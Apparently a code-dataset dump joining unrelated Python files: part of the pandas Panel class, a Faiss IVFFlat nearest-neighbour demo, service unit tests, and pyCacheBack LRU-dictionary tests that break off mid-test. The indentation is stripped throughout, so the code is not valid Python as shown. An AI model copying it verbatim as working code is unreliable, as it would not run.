vals, items, major, minor = state
items = _unpickle(items)
major = _unpickle(major)
minor = _unpickle(minor)
values = _unpickle(vals)
wp = Panel(values, items, major, minor)
self._data = wp._data
def conform(self, frame, axis='items'):
"""
Conform input DataFrame to align with chosen axis pair.
Parameters
----------
frame : DataFrame
axis : {'items', 'major', 'minor'}
Axis the input corresponds to. E.g., if axis='major', then
the frame's columns would be items, and the index would be
values of the minor axis
Returns
-------
DataFrame
"""
axes = self._get_plane_axes(axis)
return frame.reindex(**self._extract_axes_for_slice(self, axes))
def head(self, n=5):
raise NotImplementedError
def tail(self, n=5):
raise NotImplementedError
def round(self, decimals=0, *args, **kwargs):
"""
Round each value in Panel to a specified number of decimal places.
.. versionadded:: 0.18.0
Parameters
----------
decimals : int
Number of decimal places to round to (default: 0).
If decimals is negative, it specifies the number of
positions to the left of the decimal point.
Returns
-------
Panel object
See Also
--------
numpy.around
"""
nv.validate_round(args, kwargs)
if is_integer(decimals):
result = np.apply_along_axis(np.round, 0, self.values)
return self._wrap_result(result, axis=0)
raise TypeError("decimals must be an integer")
def _needs_reindex_multi(self, axes, method, level):
"""
Don't allow a multi reindex on Panel or above ndim.
"""
return False
def align(self, other, **kwargs):
raise NotImplementedError
def dropna(self, axis=0, how='any', inplace=False):
"""
Drop 2D from panel, holding passed axis constant.
Parameters
----------
axis : int, default 0
Axis to hold constant. E.g. axis=1 will drop major_axis entries
having a certain amount of NA data
how : {'all', 'any'}, default 'any'
'any': one or more values are NA in the DataFrame along the
axis. For 'all' they all must be.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
dropped : Panel
"""
axis = self._get_axis_number(axis)
values = self.values
mask = notna(values)
for ax in reversed(sorted(set(range(self._AXIS_LEN)) - {axis})):
mask = mask.sum(ax)
per_slice = np.prod(values.shape[:axis] + values.shape[axis + 1:])
if how == 'all':
cond = mask > 0
else:
cond = mask == per_slice
new_ax = self._get_axis(axis)[cond]
result = self.reindex_axis(new_ax, axis=axis)
if inplace:
self._update_inplace(result)
else:
return result
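# e.g. with axis=1 (hold major_axis constant): how='any' keeps a
# major-axis label only if its items x minor_axis slice contains no NA at
# all, while how='all' drops the label only when that slice is entirely NA.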
def _combine(self, other, func, axis=0):
if isinstance(other, Panel):
return self._combine_panel(other, func)
elif isinstance(other, DataFrame):
return self._combine_frame(other, func, axis=axis)
elif is_scalar(other):
return self._combine_const(other, func)
else:
raise NotImplementedError(
"{otype!s} is not supported in combine operation with "
"{selftype!s}".format(otype=type(other), selftype=type(self)))
def _combine_const(self, other, func):
with np.errstate(all='ignore'):
new_values = func(self.values, other)
d = self._construct_axes_dict()
return self._constructor(new_values, **d)
def _combine_frame(self, other, func, axis=0):
index, columns = self._get_plane_axes(axis)
axis = self._get_axis_number(axis)
other = other.reindex(index=index, columns=columns)
with np.errstate(all='ignore'):
if axis == 0:
new_values = func(self.values, other.values)
elif axis == 1:
new_values = func(self.values.swapaxes(0, 1), other.values.T)
new_values = new_values.swapaxes(0, 1)
elif axis == 2:
new_values = func(self.values.swapaxes(0, 2), other.values)
new_values = new_values.swapaxes(0, 2)
return self._constructor(new_values, self.items, self.major_axis,
self.minor_axis)
def _combine_panel(self, other, func):
items = self.items.union(other.items)
major = self.major_axis.union(other.major_axis)
minor = self.minor_axis.union(other.minor_axis)
# could check that everything's the same size, but forget it
this = self.reindex(items=items, major=major, minor=minor)
other = other.reindex(items=items, major=major, minor=minor)
with np.errstate(all='ignore'):
result_values = func(this.values, other.values)
return self._constructor(result_values, items, major, minor)
def major_xs(self, key):
"""
Return slice of panel along major axis.
Parameters
----------
key : object
Major axis label
Returns
-------
y : DataFrame
index -> minor axis, columns -> items
Notes
-----
major_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of major_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 2)
def minor_xs(self, key):
"""
Return slice of panel along minor axis.
Parameters
----------
key : object
Minor axis label
Returns
-------
y : DataFrame
index -> major axis, columns -> items
Notes
-----
minor_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of minor_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 1)
def xs(self, key, axis=1):
"""
Return slice of panel along selected axis.
Parameters
----------
key : object
Label
axis : {'items', 'major', 'minor'}, default 1/'major'
Returns
-------
y : ndim(self)-1
Notes
-----
xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
axis = self._get_axis_number(axis)
if axis == 0:
return self[key]
self._consolidate_inplace()
axis_number = self._get_axis_number(axis)
new_data = self._data.xs(key, axis=axis_number, copy=False)
result = self._construct_return_type(new_data)
copy = new_data.is_mixed_type
result._set_is_copy(self, copy=copy)
return result
_xs = xs
def _ixs(self, i, axis=0):
"""
Parameters
----------
i : int, slice, or sequence of integers
axis : int
"""
ax = self._get_axis(axis)
key = ax[i]
# xs cannot handle a non-scalar key, so just reindex here
# if we have a multi-index and a single tuple, then its a reduction
# (GH 7516)
if not (isinstance(ax, MultiIndex) and isinstance(key, tuple)):
if is_list_like(key):
indexer = {self._get_axis_name(axis): key}
return self.reindex(**indexer)
# a reduction
if axis == 0:
values = self._data.iget(i)
return self._box_item_values(key, values)
# xs by position
self._consolidate_inplace()
new_data = self._data.xs(i, axis=axis, copy=True, takeable=True)
return self._construct_return_type(new_data)
def groupby(self, function, axis='major'):
"""
Group data on given axis, returning GroupBy object.
Parameters
----------
function : callable
Mapping function for the chosen axis
axis : {'major', 'minor', 'items'}, default 'major'
Returns
-------
grouped : PanelGroupBy
"""
from pandas.core.groupby import PanelGroupBy
axis = self._get_axis_number(axis)
return PanelGroupBy(self, function, axis=axis)
def to_frame(self, filter_observations=True):
"""
Transform wide format into long (stacked) format as DataFrame whose
columns are the Panel's items and whose index is a MultiIndex formed
of the Panel's major and minor axes.
Parameters
----------
filter_observations : boolean, default True
Drop (major, minor) pairs without a complete set of observations
across all the items
Returns
-------
y : DataFrame
"""
_, N, K = self.shape
if filter_observations:
# shaped like the return DataFrame
mask = notna(self.values).all(axis=0)
# size = mask.sum()
selector = mask.ravel()
else:
# size = N * K
selector = slice(None, None)
data = {item: self[item].values.ravel()[selector]
for item in self.items}
def construct_multi_parts(idx, n_repeat, n_shuffle=1):
# Replicates and shuffles MultiIndex, returns individual attributes
codes = [np.repeat(x, n_repeat) for x in idx.codes]
# Assumes that each label is divisible by n_shuffle
codes = [x.reshape(n_shuffle, -1).ravel(order='F')
for x in codes]
codes = [x[selector] for x in codes]
levels = idx.levels
names = idx.names
return codes, levels, names
def construct_index_parts(idx, major=True):
levels = [idx]
if major:
codes = [np.arange(N).repeat(K)[selector]]
names = idx.name or 'major'
else:
codes = np.arange(K).reshape(1, K)[np.zeros(N, dtype=int)]
codes = [codes.ravel()[selector]]
names = idx.name or 'minor'
names = [names]
return codes, levels, names
if isinstance(self.major_axis, MultiIndex):
major_codes, major_levels, major_names = construct_multi_parts(
self.major_axis, n_repeat=K)
else:
major_codes, major_levels, major_names = construct_index_parts(
self.major_axis)
if isinstance(self.minor_axis, MultiIndex):
minor_codes, minor_levels, minor_names = construct_multi_parts(
self.minor_axis, n_repeat=N, n_shuffle=K)
else:
minor_codes, minor_levels, minor_names = construct_index_parts(
self.minor_axis, major=False)
levels = major_levels + minor_levels
codes = major_codes + minor_codes
names = major_names + minor_names
index = MultiIndex(levels=levels, codes=codes, names=names,
verify_integrity=False)
return DataFrame(data, index=index, columns=self.items)
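# Shape sketch: a Panel with items ['a', 'b'], a major_axis of length N
# and a minor_axis of length K stacks into an (N * K)-row DataFrame with
# columns ['a', 'b'] and a (major, minor) MultiIndex (minus any rows
# dropped by filter_observations).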
def apply(self, func, axis='major', **kwargs):
"""
Applies function along axis (or axes) of the Panel.
Parameters
----------
func : function
Function to apply to each combination of 'other' axes
e.g. if axis = 'items', the combination of major_axis/minor_axis
will each be passed as a Series; if axis = ('items', 'major'),
DataFrames of items & major axis will be passed
axis : {'items', 'minor', 'major'}, or {0, 1, 2}, or a tuple with two
axes
Additional keyword arguments will be passed as keywords to the function
Returns
-------
result : Panel, DataFrame, or Series
Examples
--------
Returns a Panel with the square root of each element
>>> p = pd.Panel(np.random.rand(4, 3, 2)) # doctest: +SKIP
>>> p.apply(np.sqrt)
Equivalent to p.sum(1), returning a DataFrame
>>> p.apply(lambda x: x.sum(), axis=1) # doctest: +SKIP
Equivalent to previous:
>>> p.apply(lambda x: x.sum(), axis='major') # doctest: +SKIP
Return the shapes of each DataFrame over axis 2 (i.e the shapes of
items x major), as a Series
>>> p.apply(lambda x: x.shape, axis=(0,1)) # doctest: +SKIP
"""
if kwargs and not isinstance(func, np.ufunc):
f = lambda x: func(x, **kwargs)
else:
f = func
# 2d-slabs
if isinstance(axis, (tuple, list)) and len(axis) == 2:
return self._apply_2d(f, axis=axis)
axis = self._get_axis_number(axis)
# try ufunc like
if isinstance(f, np.ufunc):
try:
with np.errstate(all='ignore'):
result = np.apply_along_axis(func, axis, self.values)
return self._wrap_result(result, axis=axis)
except AttributeError:
pass
# 1d
return self._apply_1d(f, axis=axis)
def _apply_1d(self, func, axis):
axis_name = self._get_axis_name(axis)
ndim = self.ndim
values = self.values
# iter thru the axes
slice_axis = self._get_axis(axis)
slice_indexer = [0] * (ndim - 1)
indexer = np.zeros(ndim, 'O')
indlist = list(range(ndim))
indlist.remove(axis)
indexer[axis] = slice(None, None)
indexer.put(indlist, slice_indexer)
planes = [self._get_axis(axi) for axi in indlist]
shape = np.array(self.shape).take(indlist)
# all the iteration points
points = cartesian_product(planes)
results = []
for i in range(np.prod(shape)):
# construct the object
pts = tuple(p[i] for p in points)
indexer.put(indlist, slice_indexer)
obj = Series(values[tuple(indexer)], index=slice_axis, name=pts)
result = func(obj)
results.append(result)
# increment the indexer
slice_indexer[-1] += 1
n = -1
while (slice_indexer[n] >= shape[n]) and (n > (1 - ndim)):
slice_indexer[n - 1] += 1
slice_indexer[n] = 0
n -= 1
# empty object
if not len(results):
return self._constructor(**self._construct_axes_dict())
# same ndim as current
if isinstance(results[0], Series):
arr = np.vstack([r.values for r in results])
arr = arr.T.reshape(tuple([len(slice_axis)] + list(shape)))
tranp = np.array([axis] + indlist).argsort()
arr = arr.transpose(tuple(list(tranp)))
return self._constructor(arr, **self._construct_axes_dict())
# ndim-1 shape
results = np.array(results).reshape(shape)
if results.ndim == 2 and axis_name != self._info_axis_name:
results = results.T
planes = planes[::-1]
return self._construct_return_type(results, planes)
def _apply_2d(self, func, axis):
"""
Handle 2-d slices, equiv to iterating over the other axis.
"""
ndim = self.ndim
axis = [self._get_axis_number(a) for a in axis]
# construct slabs, in 2-d this is a DataFrame result
indexer_axis = list(range(ndim))
for a in axis:
indexer_axis.remove(a)
indexer_axis = indexer_axis[0]
slicer = [slice(None, None)] * ndim
ax = self._get_axis(indexer_axis)
results = []
for i, e in enumerate(ax):
slicer[indexer_axis] = i
sliced = self.iloc[tuple(slicer)]
obj = func(sliced)
results.append((e, obj))
return self._construct_return_type(dict(results))
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
if numeric_only:
raise NotImplementedError('Panel.{0} does not implement '
'numeric_only.'.format(name))
if axis is None and filter_type == 'bool':
# labels = None
# constructor = None
axis_number = None
axis_name = None
else:
# TODO: Make other agg func handle axis=None properly
axis = self._get_axis_number(axis)
# labels = self._get_agg_axis(axis)
# constructor = self._constructor
axis_name = self._get_axis_name(axis)
axis_number = self._get_axis_number(axis_name)
f = lambda x: op(x, axis=axis_number, skipna=skipna, **kwds)
with np.errstate(all='ignore'):
result = f(self.values)
if axis is None and filter_type == 'bool':
return np.bool_(result)
axes = self._get_plane_axes(axis_name)
if result.ndim == 2 and axis_name != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
def _construct_return_type(self, result, axes=None):
"""
Return the type for the ndim of the result.
"""
ndim = getattr(result, 'ndim', None)
# need to assume they are the same
if ndim is None:
if isinstance(result, dict):
ndim = getattr(list(compat.itervalues(result))[0], 'ndim', 0)
# have a dict, so top-level is +1 dim
if ndim != 0:
ndim += 1
# scalar
if ndim == 0:
return Series(result)
# same as self
elif self.ndim == ndim:
# return the construction dictionary for these axes
if axes is None:
return self._constructor(result)
return self._constructor(result, **self._construct_axes_dict())
# sliced
elif self.ndim == ndim + 1:
if axes is None:
return self._constructor_sliced(result)
return self._constructor_sliced(
result, **self._extract_axes_for_slice(self, axes))
raise ValueError('invalid _construct_return_type [self->{self}] '
'[result->{result}]'.format(self=self, result=result))
def _wrap_result(self, result, axis):
axis = self._get_axis_name(axis)
axes = self._get_plane_axes(axis)
if result.ndim == 2 and axis != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.reindex.__doc__)
def reindex(self, *args, **kwargs):
major = kwargs.pop("major", None)
minor = kwargs.pop('minor', None)
if major is not None:
if kwargs.get("major_axis"):
raise TypeError("Cannot specify both 'major' and 'major_axis'")
kwargs['major_axis'] = major
if minor is not None:
if kwargs.get("minor_axis"):
raise TypeError("Cannot specify both 'minor' and 'minor_axis'")
kwargs['minor_axis'] = minor
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
kwargs.pop('axis', None)
kwargs.pop('labels', None)
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
# do not warn about constructing Panel when reindexing
result = super(Panel, self).reindex(**kwargs)
return result
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.rename.__doc__)
def rename(self, items=None, major_axis=None, minor_axis=None, **kwargs):
major_axis = (major_axis if major_axis is not None else
kwargs.pop('major', None))
minor_axis = (minor_axis if minor_axis is not None else
kwargs.pop('minor', None))
return super(Panel, self).rename(items=items, major_axis=major_axis,
minor_axis=minor_axis, **kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(Panel, self).reindex_axis(labels=labels, axis=axis,
method=method, level=level,
copy=copy, limit=limit,
fill_value=fill_value)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.transpose.__doc__)
def transpose(self, *args, **kwargs):
# check if a list of axes was passed in instead as a
# single *args element
if (len(args) == 1 and hasattr(args[0], '__iter__') and
not is_string_like(args[0])):
axes = args[0]
else:
axes = args
if 'axes' in kwargs and axes:
raise TypeError("transpose() got multiple values for "
"keyword argument 'axes'")
elif not axes:
axes = kwargs.pop('axes', ())
return super(Panel, self).transpose(*axes, **kwargs)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.fillna.__doc__)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(Panel, self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
def count(self, axis='major'):
"""
Return number of observations over requested axis.
Parameters
----------
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
count : DataFrame
"""
i = self._get_axis_number(axis)
values = self.values
mask = np.isfinite(values)
result = mask.sum(axis=i, dtype='int64')
return self._wrap_result(result, axis)
def shift(self, periods=1, freq=None, axis='major'):
"""
Shift index by desired number of periods with an optional time freq.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original. This is different
from the behavior of DataFrame.shift()
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, optional
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
shifted : Panel
"""
if freq:
return self.tshift(periods, freq, axis=axis)
return super(Panel, self).slice_shift(periods, axis=axis)
def tshift(self, periods=1, freq=None, axis='major'):
return super(Panel, self).tshift(periods, freq, axis)
def join(self, other, how='left', lsuffix='', rsuffix=''):
"""
Join items with other Panel either on major and minor axes column.
Parameters
----------
other : Panel or list of Panels
Index should be similar to one of the columns in this one
how : {'left', 'right', 'outer', 'inner'}
How to handle indexes of the two objects. Default: 'left'
for joining on index, None otherwise
* left: use calling frame's index
* right: use input frame's index
* outer: form union of indexes
* inner: use intersection of indexes
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
Returns
-------
joined : Panel
"""
from pandas.core.reshape.concat import concat
if isinstance(other, Panel):
join_major, join_minor = self._get_join_index(other, how)
this = self.reindex(major=join_major, minor=join_minor)
other = other.reindex(major=join_major, minor=join_minor)
merged_data = this._data.merge(other._data, lsuffix, rsuffix)
return self._constructor(merged_data)
else:
if lsuffix or rsuffix:
raise ValueError('Suffixes not supported when passing '
'multiple panels')
if how == 'left':
how = 'outer'
join_axes = [self.major_axis, self.minor_axis]
elif how == 'right':
raise ValueError('Right join not supported with multiple '
'panels')
else:
join_axes = None
return concat([self] + list(other), axis=0, join=how,
join_axes=join_axes, verify_integrity=True)
@deprecate_kwarg(old_arg_name='raise_conflict', new_arg_name='errors',
mapping={False: 'ignore', True: 'raise'})
def update(self, other, join='left', overwrite=True, filter_func=None,
errors='ignore'):
"""
Modify Panel in place using non-NA values from other Panel.
May also use object coercible to Panel. Will align on items.
Parameters
----------
other : Panel, or object coercible to Panel
The object from which the caller will be updated.
join : {'left', 'right', 'outer', 'inner'}, default 'left'
How individual DataFrames are joined.
overwrite : bool, default True
If True then overwrite values for common keys in the calling Panel.
filter_func : callable(1d-array) -> 1d-array<bool>, default None
Can choose to replace values other than NA. Return True for values
that should be updated.
errors : {'raise', 'ignore'}, default 'ignore'
If 'raise', will raise a ValueError if the DataFrame and other
both contain non-NA data in the same place.
.. versionchanged :: 0.24.0
Changed from `raise_conflict=False|True`
to `errors='ignore'|'raise'`.
See Also
--------
DataFrame.update : Similar method for DataFrames.
dict.update : Similar method for dictionaries.
"""
if not isinstance(other, self._constructor):
other = self._constructor(other)
axis_name = self._info_axis_name
axis_values = self._info_axis
other = other.reindex(**{axis_name: axis_values})
for frame in axis_values:
self[frame].update(other[frame], join=join, overwrite=overwrite,
filter_func=filter_func, errors=errors)
def _get_join_index(self, other, how):
if how == 'left':
join_major, join_minor = self.major_axis, self.minor_axis
elif how == 'right':
join_major, join_minor = other.major_axis, other.minor_axis
elif how == 'inner':
join_major = self.major_axis.intersection(other.major_axis)
join_minor = self.minor_axis.intersection(other.minor_axis)
elif how == 'outer':
join_major = self.major_axis.union(other.major_axis)
join_minor = self.minor_axis.union(other.minor_axis)
return join_major, join_minor
# miscellaneous data creation
@staticmethod
def _extract_axes(self, data, axes, **kwargs):
"""
Return a list of the axis indices.
"""
return [self._extract_axis(self, data, axis=i, **kwargs)
for i, a in enumerate(axes)]
@staticmethod
def _extract_axes_for_slice(self, axes):
"""
Return the slice dictionary for these axes.
"""
return {self._AXIS_SLICEMAP[i]: a for i, a in
zip(self._AXIS_ORDERS[self._AXIS_LEN - len(axes):], axes)}
@staticmethod
def _prep_ndarray(self, values, copy=True):
if not isinstance(values, np.ndarray):
values = np.asarray(values)
# NumPy strings are a pain, convert to object
if issubclass(values.dtype.type, compat.string_types):
values = np.array(values, dtype=object, copy=True)
else:
if copy:
values = values.copy()
if values.ndim != self._AXIS_LEN:
raise ValueError("The number of dimensions required is {0}, "
"but the number of dimensions of the "
"ndarray given was {1}".format(self._AXIS_LEN,
values.ndim))
return values
@staticmethod
def _homogenize_dict(self, frames, intersect=True, dtype=None):
"""
Conform set of _constructor_sliced-like objects to either
an intersection of indices / columns or a union.
Parameters
----------
frames : dict
intersect : boolean, default True
Returns
-------
dict of aligned results & indices
"""
result = dict()
# caller differs dict/ODict, preserved type
if isinstance(frames, OrderedDict):
result = OrderedDict()
adj_frames = OrderedDict()
for k, v in compat.iteritems(frames):
if isinstance(v, dict):
adj_frames[k] = self._constructor_sliced(v)
else:
adj_frames[k] = v
axes = self._AXIS_ORDERS[1:]
axes_dict = {a: ax for a, ax in zip(axes, self._extract_axes(
self, adj_frames, axes, intersect=intersect))}
reindex_dict = {self._AXIS_SLICEMAP[a]: axes_dict[a] for a in axes}
reindex_dict['copy'] = False
for key, frame in compat.iteritems(adj_frames):
if frame is not None:
result[key] = frame.reindex(**reindex_dict)
else:
result[key] = None
axes_dict['data'] = result
axes_dict['dtype'] = dtype
return axes_dict
@staticmethod
def _extract_axis(self, data, axis=0, intersect=False):
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
have_raw_arrays = False
have_frames = False
for v in data.values():
if isinstance(v, self._constructor_sliced):
have_frames = True
elif v is not None:
have_raw_arrays = True
raw_lengths.append(v.shape[axis])
if have_frames:
                # we want the "old" behavior here, of sorting only if
# 1. we're doing a union (intersect=False)
# 2. the indices are not aligned.
index = _get_objs_combined_axis(data.values(), axis=axis,
intersect=intersect, sort=None)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('ndarrays must match shape on '
'axis {ax}'.format(ax=axis))
if have_frames:
if lengths[0] != len(index):
raise AssertionError('Length of data and index must match')
else:
index = Index(np.arange(lengths[0]))
if index is None:
index = Index([])
return ensure_index(index)
def sort_values(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sorting values is not
supported for Panel objects and will raise an error.
"""
super(Panel, self).sort_values(*args, **kwargs)
Panel._setup_axes(axes=['items', 'major_axis', 'minor_axis'], info_axis=0,
stat_axis=1, aliases={'major': 'major_axis',
'minor': 'minor_axis'},
slicers={'major_axis': 'index',
'minor_axis': 'columns'},
docs={})
ops.add_special_arithmetic_methods(Panel)
ops.add_flex_arithmetic_methods(Panel)
Panel._add_numeric_operations()
| bsd-3-clause | -7,667,139,979,059,347,000 | 34.208438 | 79 | 0.545581 | false |
h-j-13/MyNote | Open Source/Faiss/faiss_learn/Demo/2-IVFFlat.py | 1 | 1309 | # encoding:utf-8
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD+Patents license found in the
# LICENSE file in the root directory of this source tree.
# author : Facebook
# translate : h-j-13
import numpy as np
d = 64                           # vector dimension
nb = 100000                      # database size
nq = 10000                       # number of queries
np.random.seed(1234)             # random seed, makes results reproducible
xb = np.random.random((nb, d)).astype('float32')
xb[:, 0] += np.arange(nb) / 1000.
xq = np.random.random((nq, d)).astype('float32')
xq[:, 0] += np.arange(nq) / 1000.
import faiss
nlist = 100
k = 4
quantizer = faiss.IndexFlatL2(d) # the other index
index = faiss.IndexIVFFlat(quantizer, d, nlist, faiss.METRIC_L2)
# here we specify METRIC_L2, by default it performs inner-product search
assert not index.is_trained
index.train(xb)
assert index.is_trained
index.add(xb)                    # adding the vectors can be a little slow
D, I = index.search(xq, k)       # actual search
print(I[-5:])                    # neighbors of the last five queries
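# A hedged addition, not part of the original demo: gauge the recall of the
# IVF search by comparing against exact brute-force results; IndexFlatL2 is
# assumed to serve as ground truth here.
gt_index = faiss.IndexFlatL2(d)
gt_index.add(xb)
_, gt_I = gt_index.search(xq, k)
recall_at_1 = (I[:, 0] == gt_I[:, 0]).sum() / float(nq)
print(recall_at_1)               # fraction of queries with the true nearest neighbor found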
index.nprobe = 10                # default nprobe is 1, try a larger value
D, I = index.search(xq, k)
print(I[-5:])                    # neighbors of the last five queries | gpl-3.0 | -9,143,578,694,520,731,000 | 29.153846 | 73 | 0.6 | false |
MuhammedHasan/disease-diagnosis | src/services/tests.py | 1 | 1461 | import unittest
import logging
from .solution_service import SolutionService
from .naming_service import NamingService
from .data_reader import DataReader
class TestSolutionService(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.logger = logging.getLogger('services')
cls.logger.setLevel(logging.INFO)
cls.logger.addHandler(logging.FileHandler('../logs/services.log'))
def setUp(self):
self.data = [{'acon_C_c': 1}, ]
self.service = SolutionService()
@unittest.skip('too long tests')
def test_get_solutions(self):
solutions = self.service.get_solutions(self.data)
self.assertNotEqual(len(solutions), 0)
self.assertNotEqual(len(solutions[0]), 0)
self.assertNotEqual(len(next(iter(solutions[0].values()))), 0)
class TestNamingService(unittest.TestCase):
def setUp(self):
self.service = NamingService('ecolin')
def test_to(self):
self.assertNotEqual(len(self.service._names), 0)
self.service._names = {'x': 'y'}
self.assertEqual(self.service.to('x'), 'y')
self.assertEqual(self.service.to('a'), None)
named = self.service.to({'x': 1, 'c': 1})
self.assertDictEqual(named, {'y': 1})
class TestDataReader(unittest.TestCase):
def setUp(self):
self.service = DataReader()
def test_solution_reader(self):
self.assertNotEqual(len(self.service.read_solutions()), 0)
| gpl-3.0 | -8,841,737,580,263,945,000 | 27.647059 | 74 | 0.657769 | false |
rzzzwilson/pyCacheBack | test_pycacheback.py | 1 | 14987 | #!/usr/bin/env python
"""
Test pycacheback
"""
import os
import shutil
import random
import copy
from pycacheback import pyCacheBack
import unittest
class TestpyCacheBack(unittest.TestCase):
def testSimple(self):
"""A simple 'smoke test' for the extended dictionary."""
# make an extended dictionary and define a key/value pair
a = pyCacheBack()
a[1] = 'one'
# make sure we can retrieve the pre-defined key/value pair
msg = "a[1] != 'one'!"
self.assertEqual(a[1], 'one', msg)
# make sure that accessing non-existant key raises KeyError
self.assertRaises(KeyError, a.__getitem__, 2)
# make sure the len() function works correctly
msg = 'len(a) should be 1, got %d!' % len(a)
self.assertEqual(len(a), 1, msg)
def testDict(self):
"""Test the basic dictionary methods that should still work."""
# make an extended dictionary and define some key/value pairs
a = pyCacheBack()
a[1] = 'one'
a[2] = '2'
a[3] = 3
a['4'] = 'four'
# check other dictionary methods
msg = 'len(a) should be 4, got %d!' % len(a)
self.assertEqual(len(a), 4, msg)
msg = "'1 in a' was False, should be True!"
self.assertTrue(1 in a, msg)
msg = "'\'4\' in a' was False, should be True!"
self.assertTrue('4' in a, msg)
b = a.copy()
msg = "a.copy() doesn't return a true copy'"
self.assertEqual(a, b, msg)
msg = "a.get(1) should return 'one', got %s" % a.get(1)
self.assertEqual(a.get(1), 'one', msg)
msg = ("a.get(10, 'NONE') should return 'NONE', got %s"
% str(a.get(10, 'NONE')))
self.assertEqual(a.get(10, 'NONE'), 'NONE', msg)
msg = "a.has_key(2) should return True, got %s" % str(2 in a)
self.assertTrue(2 in a, msg)
msg = ("a.has_key(10) should return False, got %s"
% str(10 in a))
self.assertFalse(10 in a, msg)
msg = ("a.items() should return [(1, 'one'), (2, '2'), (3, 3), "
"('4', 'four')], got %s" % str(a.items()))
self.assertEqual([(1, 'one'), (2, '2'), (3, 3), ('4', 'four')],
list(a.items()), msg)
msg = "a.keys() should return [1, 2, 3, '4'], got %s" % str(a.keys())
self.assertEqual([1, 2, 3, '4'], list(a.keys()), msg)
msg = "a.keys() should return [1, 2, 3, '4'], got %s" % str(a.keys())
self.assertEqual([1, 2, 3, '4'], list(a.keys()), msg)
msg = ("a.values() should return ['one', '2', 3, 'four'], got %s"
% str(a.values()))
self.assertEqual(['one', '2', 3, 'four'], list(a.values()), msg)
result = a.setdefault(10, 'TEN')
msg = "a.setdefault(10, 'TEN') doesn't return 'TEN'?"
self.assertEqual(result, 'TEN', msg)
msg = "a.setdefault() doesn't set the default?"
self.assertEqual(a[10], 'TEN', msg)
result = a.pop(10)
msg = "a.pop(10) should return 'TEN' but got %s?" % result
self.assertEqual(result, 'TEN', msg)
result = a.pop(10, 'not found')
msg = ("a.pop(10, 'not found') should return 'not found' but got %s?"
% result)
self.assertEqual(result, 'not found', msg)
#msg = "a.pop(10) should raise KeyError exception, but didn't?"
self.assertRaises(KeyError, a.pop, 10)
msg = "a.update(b) should set 'TEN' key but didn't"
b = {'TEN': 10}
a.update(b)
self.assertEqual(a['TEN'], 10, msg)
a.clear()
msg = 'After clear(), len(a) should be 0, got %d!' % len(a)
self.assertEqual(len(a), 0, msg)
b = {'TEN': 10}
a.update(b)
msg = "a.keys() should return ['TEN'], got %s" % str(a.keys())
self.assertEqual(list(a.keys()), ['TEN'], msg)
def testLRU(self):
"""Test the LRU mechanism."""
# make an extended dictionary, maxLRU is 2 for testing
a = pyCacheBack(max_lru=2)
# the LRU list should be empty when we start
msg = ("Initial LRU list should be empty, but it's %s"
% str(a._lru_list))
self.assertEqual(a._lru_list, [], msg)
# make sure the len() function works correctly
msg = "len(a) should be 0, got %d!" % len(a)
self.assertEqual(len(a), 0, msg)
# add a key/value pair, recheck LRU and length
a['test'] = 'test value'
msg = ("LRU list should be %s, but it's %s"
% (str(['test']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test'], msg)
msg = "len(a) should be 1, got %d!" % len(a)
self.assertEqual(len(a), 1, msg)
# add another key/value pair, recheck LRU
a['test2'] = 'another test value'
msg = ("LRU list should be %s, but it's %s"
% (str(['test2', 'test']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test2', 'test'], msg)
# access first key/value pair, check LRU changed
b = a['test']
msg = ("LRU list should be %s, but it's %s"
% (str(['test', 'test2']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test', 'test2'], msg)
# make sure the len() function works correctly
msg = "len(a) should be 2, got %d!" % len(a)
self.assertEqual(len(a), 2, msg)
# add third key/value pair, check LRU changed
a['test3'] = 100
msg = ("LRU list should be %s, but it's %s"
% (str(['test3', 'test']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test3', 'test'], msg)
# make sure the len() function works correctly (still 2)
msg = "len(a) should be 2, got %d!" % len(a)
self.assertEqual(len(a), 2, msg)
# delete first key/value pair, check LRU changed
del a['test']
msg = ("LRU list should be %s, but it's %s"
% (str(['test3']), str(a._lru_list)))
self.assertEqual(a._lru_list, ['test3'], msg)
# make sure the len() function works correctly
msg = "len(a) should be 1, got %d!" % len(a)
